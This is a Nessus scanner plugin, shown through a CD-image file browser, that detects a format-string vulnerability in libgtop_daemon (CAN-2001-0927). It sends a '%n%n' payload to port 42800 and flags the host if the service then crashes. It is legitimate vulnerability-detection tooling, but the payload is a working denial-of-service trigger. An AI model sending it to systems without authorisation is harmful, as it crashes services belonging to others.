home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / libgtop_daemon.nasl < prev    next >
Text File  |  2005-01-14  |  1KB  |  61 lines

  1.  
  2. #
  3. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(10812);
  11.  script_cve_id("CAN-2001-0927");
  12.  script_version ("$Revision: 1.7 $");
  13.  
  14.  
  15.  name["english"] = "libgtop_daemon format string";
  16.  
  17.  script_name(english:name["english"]);
  18.  
  19.  desc["english"] = "
  20. It seems that libgtop is/was running on this port
  21. and is vulnerable to a format string attack which
  22. may allow an attacker to gain a shell on this
  23. host (with the privileges of 'nobody').
  24.  
  25. Solution: upgrade to the latest version of libgtop_daemon
  26. Risk factor : High";
  27.  
  28.  
  29.  script_description(english:desc["english"]);
  30.  
  31.  summary["english"] = "Crashes libgtop_daemon";
  32.  
  33.  script_summary(english:summary["english"]);
  34.  
  35.  script_category(ACT_DESTRUCTIVE_ATTACK);
  36.  
  37.  
  38.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
  39.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
  40.  family["english"] = "Gain a shell remotely";
  41.  family["francais"] = "Obtenir un shell α distance";
  42.  script_family(english:family["english"], francais:family["francais"]);
  43.  script_require_ports(42800);
  44.  exit(0);
  45. }
  46.  
  47.  
  48. port = 42800;
  49. if(get_port_state(port))
  50. {
  51.  soc = open_sock_tcp(port);
  52.  if(soc)
  53.  {
  54.  send(socket:soc, data:string("%n%n\r\n"));
  55.  close(soc);
  56.  sleep(1);
  57.  soc = open_sock_tcp(port);
  58.  if(!soc)security_hole(port);
  59.  }
  60. }
  61.